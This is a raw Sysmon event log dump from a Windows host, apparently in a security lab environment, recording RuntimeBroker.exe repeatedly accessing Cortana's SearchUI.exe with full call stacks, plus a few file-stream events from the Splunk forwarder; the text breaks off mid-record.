12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.173{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E52B4F8E6B6368663791FC473713A6,SHA256=725CBFE35E36BADB9AB3E331952598BDB9271A295DED855CC1031A33B5F95E9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.845{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55CA298E7523D9684747ADD07BFA93B1,SHA256=3EFC55F11607971CA2F14F402D1C322E9E8A6FD1EA4E1CB12639C336D9E94E09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.626{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.454{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.407{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=E9792A78BAD8F9B19189F84CE4154DBF,SHA256=EF8E690550D15948653537360444AE845DEE1FC718F783D4BD63DC473E3655E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:52.376{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\com